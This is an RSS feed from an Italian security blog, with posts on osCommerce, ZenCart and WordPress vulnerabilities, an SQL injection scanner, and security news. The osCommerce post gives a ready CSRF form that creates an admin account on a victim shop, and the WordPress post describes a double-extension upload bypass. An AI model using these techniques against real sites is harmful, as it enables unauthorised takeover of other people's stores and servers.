<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Capn3m0 WebSecurity &#187; security</title>
	<atom:link href="http://www.capn3m0.org/tag/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.capn3m0.org</link>
	<description>...hacking, security, wifi and more...</description>
	<lastBuildDate>Tue, 07 Feb 2012 20:08:15 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>[EXPLOIT] &#8211; osCommerce v3.0a5 Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 19:14:17 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 3]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[xsrf]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2725</guid>
		<description><![CDATA[Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release osCommerce 3.0.a5. Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo.jpg" rel="lightbox[2725]" title="osCommerceLogo"><img class="alignleft size-thumbnail wp-image-2726" title="osCommerceLogo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo-150x137.jpg" alt="[EXPLOIT]   osCommerce v3.0a5 Multiple Vulnerabilities" width="150" height="137" /></a>Seguendo la scia di notizie degli ultimi tempi che han portato alla luce <strong>gravi vulnerabilità</strong> per le ultime versioni di <strong><a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html">OsCommerce (2.3.1)</a> e<a href="http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html"> ZenCart (1.3.9h)</a></strong> non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release <strong>osCommerce 3.0.a5</strong>.</p>
<p>Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente &#8220;stabili&#8221; sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo <strong>Xss, Full Path Disclosure, Local File Inclusion e XSRF</strong>.</p>
<p>La<strong> Full Path Disclosure</strong> consiste nell&#8217;interrogare alcuni file del Template di OsCommerce che, andando in errore,<strong> mostrano a video la full path</strong> della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La <strong>XSS permette di iniettare codice JavaScript </strong>sfruttando una falla del file &#8220;products.php&#8221; mentre la <strong>Local File Inclusion</strong> consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.</p>
<p>Anche in questo caso c&#8217;è una <strong>falla più grave </strong>delle altre e a mio avviso è la <strong>XSRF</strong> che permette di inviare comandi all&#8217;applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico <strong>sarà possibile creare un nuovo Admin sull&#8217;OsCommerce</strong>.</p>
<p>Basterà creare una pagina &#8220;.html&#8221; contenente il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;html&gt;
&lt;body&gt;
&lt;form action=&quot;http://&lt;sito vittima&gt;/admin/index.php?administrators&amp;action=save&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_name&quot; value=&quot;&lt;nomeutente&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_password&quot; value=&quot;&lt;password&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;modules[]&quot; value=&quot;0?&gt;
&lt;input type=&quot;hidden&quot; name=&quot;subaction&quot; value=&quot;confirm&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></div></div>

<p>Ovviamente dovrete sostituire i seguenti parametri:</p>
<p><strong>&lt;sito vittima</strong>&gt; con il dominio del sito in cui si vuole creare l&#8217;account</p>
<p><strong>&lt;nomeutente&gt;</strong> con il nome utente del nuovo Admin</p>
<p><strong>&lt;password&gt;</strong> con la password da associare al nuovo Admin</p>
<p>Una volta creata la pagina richiamatela dal vostro Browser e cliccate su &#8220;Save&#8221;.</p>
<p>Se tutto è andato a buon fine accedendo all&#8217;url:</p>
<p><cite>http://&lt;sito vittima&gt;/admin/</cite></p>
<p><strong>potrete loggarvi come Admin</strong> con i dati appena inseriti.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell’articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/oscommerce-v3-0a5-multiple-vulnerabilities/" target="_blank">osCommerce v3.0a5 [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; ZenCart 1.3.9h Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 17:37:19 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack zencart]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[zencart]]></category>
		<category><![CDATA[zencart 1.3.9h]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2723</guid>
		<description><![CDATA[E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una nuova falla per OsCommerce a catena vengano individuate le stesse (o quasi) falle per ZenCart, altro noto Cms derivato dallo stesso OsCommerce. La versione vulnerabile è l&#8217;ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo.jpg" rel="lightbox[2723]" title="zencart_logo"><img class="alignleft size-thumbnail wp-image-2724" title="zencart_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo-150x88.jpg" alt="[EXPLOIT]   ZenCart 1.3.9h Multiple Vulnerabilities" width="150" height="88" /></a>E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una <a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html"><strong>nuova falla</strong></a> per OsCommerce a catena vengano individuate le stesse (o quasi) falle per<a href="http://www.zen-cart.com/" target="_blank"> <strong>ZenCart</strong></a>, altro noto Cms derivato dallo stesso OsCommerce.</p>
<p>La versione vulnerabile è l&#8217;ultima disponibile ossia la <strong>1.3.9h</strong> e presenta vulnerabilità di vario tipo: <strong>Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload</strong>.</p>
<p>La vulnerabilità <strong>Full Path Disclosure</strong> permette, se la gestione degli errori è configurata per mostrarli a video, di<strong> conoscere la path assoluta</strong> dell&#8217;applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l&#8217;informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due <strong>XSS</strong>, invece, non affliggono l&#8217;attuale 1.3.9h ma <strong>tutte le versioni precedenti</strong>. Le vulnerabilità sono localizzate nel campo &#8220;Quantità&#8221; del carrello che permette l<strong>&#8216;injection di codice XSS</strong> e nell&#8217;Area Amministrativa &#8220;Location/Taxes&#8221;. Per quest&#8217;ultima, quindi, si presume che si abbia già l&#8217;accesso Admin.</p>
<p>L&#8217;ultima vulnerabilità, la più grave, riguarda invece il <strong>componente Banner (banner_manager.php)</strong> che, così come per OsCommerce, permette di <strong>effettuare l&#8217;upload di files</strong> che verranno salvati nella cartella &#8220;images&#8221;.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell&#8217;articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/zen-cart-v-1-3-9h-multiple-vulnerabilities/" target="_blank">Zen Cart &lt;= v.1.3.9h [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>XCode SQL Injection Scanner</title>
		<link>http://www.capn3m0.org/xcode-sql-injection-scanner.html</link>
		<comments>http://www.capn3m0.org/xcode-sql-injection-scanner.html#comments</comments>
		<pubDate>Tue, 15 Mar 2011 18:41:57 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xcode]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=1903</guid>
		<description><![CDATA[&#160; Breve videoguida all&#8217;utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili. Un buon tool che permette di risparmiare tempo durante i pentest! http://www.youtube.com/v/9d1bL5dN_KY?f=videos&#38;app=youtube_gdata Read the rest here: XCode SQL Injection Scanner]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Breve videoguida all&#8217;utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili.</p>
<p>Un buon tool che permette di risparmiare tempo durante i pentest! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="XCode SQL Injection Scanner" class='wp-smiley' title="XCode SQL Injection Scanner pics" /> </p>
<p><object width="370" height="305" type="application/x-shockwave-flash" data="http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata"><a href="http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata">http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata</a></object></p>
<p>Read the rest here:<br />
<a title="XCode SQL Injection Scanner" href="http://www.youtube.com/watch?v=9d1bL5dN_KY&amp;feature=youtube_gdata" target="_blank">XCode SQL Injection Scanner</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/xcode-sql-injection-scanner.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</title>
		<link>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html</link>
		<comments>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html#comments</comments>
		<pubDate>Mon, 01 Nov 2010 20:36:05 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack mail]]></category>
		<category><![CDATA[provider]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sicurezza informatica]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=808</guid>
		<description><![CDATA[ Ieri (28/10/2010) il programma televisivo Le Iene ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo. ]]></description>
			<content:encoded><![CDATA[<p>Il 28/10/2010 il programma televisivo <strong>Le Iene</strong> ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo.</p>
<p>
<object id="veohFlashPlayer" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="450" height="341" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="veohFlashPlayer" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" /><param name="allowfullscreen" value="true" /><embed id="veohFlashPlayer" type="application/x-shockwave-flash" width="450" height="341" src="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" allowscriptaccess="always" allowfullscreen="true" name="veohFlashPlayer"></embed></object>
</p>
<p>Read the original here:<br />
 <a title="Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano" href="http://feedproxy.google.com/~r/OverSecurity/~3/9x5bVt5F7CY/" target="_blank">Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>La Polizia Postale si accorda con FaceBook per spiare i profili Italiani!</title>
		<link>http://www.capn3m0.org/polizia-postale-facebook-spiare-profili-italiani.html</link>
		<comments>http://www.capn3m0.org/polizia-postale-facebook-spiare-profili-italiani.html#comments</comments>
		<pubDate>Sun, 31 Oct 2010 14:22:40 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[censura]]></category>
		<category><![CDATA[cronaca informatica]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[polizia]]></category>
		<category><![CDATA[polizia-postale]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=802</guid>
		<description><![CDATA[ Per una volta, l’Italia è più avanti degli Stati Uniti: come rivela  L’Espresso , la Polizia Postale italiana ha appena stipulato un accordo con Facebook per poter accedere ai profili senza alcun mandato né rogatoria . Negli USA, al Congresso stanno da tempo litigando per approvare un decreto per permettere la stessa cosa. Noi l’abbiamo fatto senza battere ciglio. ]]></description>
			<content:encoded><![CDATA[<p>Per una volta, l’Italia è più avanti degli Stati Uniti: come rivela  L’Espresso , la Polizia Postale italiana ha appena stipulato un accordo con Facebook per poter accedere ai profili senza alcun mandato né rogatoria . Negli USA, al Congresso stanno da tempo litigando per approvare un decreto per permettere la stessa cosa. Noi l’abbiamo fatto senza battere ciglio.</p>
<p><img src="http://www.capn3m0.org/wp-content/uploads/2010/10/a5a86385screenshots-150x99.jpg" alt="La Polizia Postale si accorda con FaceBook per spiare i profili Italiani!"  title="La Polizia Postale si accorda con FaceBook per spiare i profili Italiani! pics" /></p>
<p>Link:<br />
<a title="La Polizia Postale si accorda con FaceBook per spiare i profili Italiani!" href="http://feedproxy.google.com/~r/OverSecurity/~3/hxz04cF5IrM/" target="_blank">La Polizia Postale si accorda con FaceBook per spiare i profili Italiani!</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/polizia-postale-facebook-spiare-profili-italiani.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; WordPress </title>
		<link>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html</link>
		<comments>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html#comments</comments>
		<pubDate>Sat, 14 Nov 2009 16:24:46 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=337</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock.png" rel="lightbox[337]" title="WordPress File Arbitrary Upload"><img class="alignleft size-thumbnail wp-image-338" title="WordPress File Arbitrary Upload" src="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock-150x150.png" alt="[EXPLOIT]   Wordpress <= 2.8.5 Arbitrary File Upload" width="150" height="150" /></a>Ieri avevo dato <a href="http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html" target="_self">notizia</a> del rilascio della versione<strong> 2.8.6 di WordPress</strong> che risolveva due falle di <strong>sicurezza</strong>.</p>
<p>La notizia non era molto dettagliata poiché la <strong>vulnerabilità</strong> era stata annunciata molto genericamente come una vulnerabilità che permetteva di &#8220;<strong>aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache&#8221;.</strong> Ora che è stata patchata, come spesso accade, iniziano a trovarsi maggiori informazioni e <strong>Proof of Concept</strong>.</p>
<p>In realtà la vulnerabilità <strong>permette di uploadare file bypassando il controllo</strong> della tipologia di file e permettendo, quindi, di uploadare script php e similari che possono poi essere richiamati da colui che attacca. <strong>Affligge tutte le versioni inferiori alla 2.8.5</strong> (compresa) perciò provvedete quanto prima ad aggiornare il vostro blog.</p>
<p><span id="more-337"></span>
<p>La notizia era stata pubblicata l&#8217;11 Novembre scorso nella nota Mailing List <a href="http://seclists.org/fulldisclosure" target="_blank"><strong>Full Disclosure</strong></a> dove Dawid Golunski ha pubblicato un Proof Of Concept che potete leggere a questo <a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">link</a>. Praticamente spiega che la verifica del file uploadato avviene confrontando l&#8217;estensione del file, estrapolata tramite una Regular Expression, con un array dei Mime Type permessi.</p>
<p>La Regular Expression, però, unita al fatto che i WebServer <a href="http://apache.org/" target="_blank"><strong>Apache</strong></a> (solamente in una particolare configurazione spiegata <a href="http://seclists.org/fulldisclosure/2009/Nov/152" target="_blank"><strong>qui</strong></a>) consentono di creare file nel formato</p>
<p>
<blockquote>filename.ext1.ext2</p></blockquote>
<p>può essere bypassata uploadando un file contenente codice Php e assegnandogli un nome come il seguente:</p>
<blockquote><p>phpinfo.php.jpg</p>
</blockquote>
<p>In questo modo la verifica del file applicata da WordPress estrapolerebbe tramite la RegEx l&#8217;estensione &#8220;.jpg&#8221; e successivamente, verificandola con l&#8217;Array dei Mime Types ammessi, <strong>permetterebbe al file di essere uploadato scambiandolo per un&#8217;immagine</strong>.</p>
<p>Una volta fatto ciò chi attacca potrà richiamare lo script digitando la path standard dei file uploadati di WordPress ossia:</p>
<blockquote><p>http:///wp-content/uploads/2009//phpinfo.php.jpg</p>
</blockquote>
<p>Questa vulnerabilità, sebbene grave, non dovrebbe causare gravi danni visto <strong>che chi attaca deve essere un membro dello staff con privilegi di pubblicazione</strong> come era stato annunciato in occasione della 2.8.6.</p>
<p>Resta invece ancora sconosciuta la vulnerabilità di Cross Site Scripting scoperta da Benjamin Flesch sempre nella versione 2.8.5 di WordPress.</p>
<p>Eccovi alcuni link correlati:</p>
<p><a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">Proof Of Concepts &#8211; WordPress &lt;= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution by Dawid Golunski</a></p>
<p><a href="http://www.vupen.com/english/advisories/2009/3234" target="_blank">Vupen &#8211; WordPress Arbitrary File Upload and Cross Site Scripting Vulnerabilities</a></p>
<p><a href="http://www.securityfocus.com/bid/37014/info" target="_blank">SecurityFocus &#8211; <span>WordPress Unspecified Cross Site Scripting Vulnerability</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!</title>
		<link>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html</link>
		<comments>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html#comments</comments>
		<pubDate>Fri, 13 Nov 2009 08:54:53 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[security release]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=331</guid>
		<description><![CDATA[Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli attacchi hacker avvenissero grazie a falle presenti in WordPress 2.8.5, rilasciato neanche un mese fa, è stata appena annunciata la security release 2.8.6 che contiene due importati fix di sicurezza. La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp.JPG" rel="lightbox[331]" title="Wordpress 2.8.6"><img class="alignleft size-thumbnail wp-image-333" title="Wordpress 2.8.6" src="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp-150x150.jpg" alt="Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!" width="150" height="150" /></a>Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html" target="_self"><strong>attacchi hacker</strong></a> avvenissero grazie a falle presenti in <strong>WordPress 2.8.5</strong>, rilasciato neanche un mese fa, è stata appena annunciata la <a href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/" target="_blank"><strong>security release 2.8.6</strong></a> che contiene due importati fix di sicurezza.</p>
<p>La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta da Benjamin Flesch che permetteva di eseguire <a href="http://it.wikipedia.org/wiki/Cross-site_scripting" target="_blank"><strong>XSS (Cross Site Scripting)</strong></a> agli utenti registrati con privilegi di pubblicazione.</p>
<p>La seconda, invece, è stata scoperta da Dawid Golunski e consentiva di<strong> aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache.</strong></p>
<p>In attesa della versione <strong>WordPress 2.9</strong> consiglio a tutti di provvedere ad aggiornare la propria versione tramite la funzione di &#8220;Aggiornamento Automatico&#8221; che verrà suggerita non appena entrerete nella vostra Bacheca.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[SECURITY] &#8211; 5 utili plugins per Firefox</title>
		<link>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html</link>
		<comments>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html#comments</comments>
		<pubDate>Tue, 17 Feb 2009 20:35:45 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[cookie manipulation]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hackbar]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[header http]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[remote file inclusion]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql inject me]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[tamper data]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[web developer]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[xss me]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=248</guid>
		<description><![CDATA[In questo articolo vi presenterò 5 utili Addons di Firefox che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web. I plugins di cui parlerò sono i seguenti: Web Developer Bar Xss Me Sql Inject Me HackBar Tamper Data Questi 5 plugin torneranno [...]]]></description>
			<content:encoded><![CDATA[<p>In questo articolo vi presenterò <a href="https://addons.mozilla.org/it/firefox/" target="_blank"><strong>5 utili Addons di Firefox </strong></a>che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web.</p>
<p>I plugins di cui parlerò sono i seguenti:</p>
<ul>
<li><strong>Web Developer Bar</strong></li>
<li><strong>Xss Me</strong></li>
<li><strong>Sql Inject Me</strong></li>
<li><strong>HackBar</strong></li>
<li><strong>Tamper Data</strong></li>
</ul>
<p>Questi 5 plugin torneranno molto utili quando proveremo ad effettuare le nostre prime analisi di sicurezza in quanto permettono di analizzare diversi aspetti di un sito web. Va detto che non sono programmi  &#8220;per bucare&#8221; ma semplicemente dei test i cui risultati, se si hanno le giuste conoscenze, possono aiutare ad individuare falle o vulnerabilità in un dato sito.</p>
<p><span id="more-248"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>18446744073709551615 &#8211; Un nuovo hack in arrivo?</title>
		<link>http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html</link>
		<comments>http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html#comments</comments>
		<pubDate>Mon, 09 Feb 2009 19:15:20 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=122</guid>
		<description><![CDATA[Negli ultimi giorni sto riscontrando un aumento di casi di hacking in cui apparentemente l&#8217;azione malevola consiste nel far visualizzare alla fine della home page della vittima il numero &#8220;18446744073709551615&#8220;. Ricercando in rete utilizzando questo numero come chiave di ricerca si troveranno numerosi articoli/post che affermano che si tratta del massimo numero utilizzabile all&#8217;interno di [...]]]></description>
			<content:encoded><![CDATA[<p>Negli ultimi giorni sto riscontrando un aumento di casi di hacking in cui apparentemente l&#8217;azione malevola consiste nel far visualizzare alla fine della home page della vittima il numero &#8220;<strong>18446744073709551615</strong>&#8220;.</p>
<p>Ricercando in rete utilizzando questo numero come chiave di ricerca si troveranno numerosi articoli/post che affermano che si tratta del massimo numero utilizzabile all&#8217;interno di un campo <strong>BIGINT </strong>in Php. Questo porterà l&#8217;ignaro utente ad impazzire alla ricerca della funzione all&#8217;interno del proprio sito che esegue calcoli che portano alla comparsa di questo numero. Tutto ciò sarà inutile!</p>
<p>In realtà questo numero viene visualizzato poiché le pagine &#8220;<strong>index.php</strong>&#8221; del proprio sito sono state hackerate inserendo al loro interno la seguente funzione che<strong> non altera il comportamento della pagina ma visualizza a pié di pagina il numero in oggetto</strong>.</p>
<p><span id="more-122"></span></p>
<p>La pagina modificata apparirà con il seguente codice:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
